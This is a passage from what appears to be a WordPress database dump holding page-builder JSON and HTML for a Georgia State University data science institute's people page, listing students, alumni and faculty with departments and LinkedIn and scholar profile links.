Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c180\",\"index\":1,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c185\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c185\",\"index\":2,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c185\",\"index\":1,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c190\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c190\",\"index\":2,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c190\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c199\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c199\",\"index\":2,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c199\",\"index\":1,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c204\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c204\",\"index\":2,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c204\",\"index\":1,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c158\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c211\",\"parentId\":\"182-c210\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c210\",\"parentId\":\"182-c209\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c209\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-13 09:19:36','2023-10-13 13:19:36','',562,'https://gsudice.dataconn.net/?p=1706',0,'revision','',0),(1707,1,'2023-10-13 09:19:36','2023-10-13 13:19:36','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c64\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c64 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c65-outer\">\n            <div data-colibri-id=\"182-c65\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c65 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-986 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1-1-e1697138676716.jpeg\" class=\"wp-image-1648 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 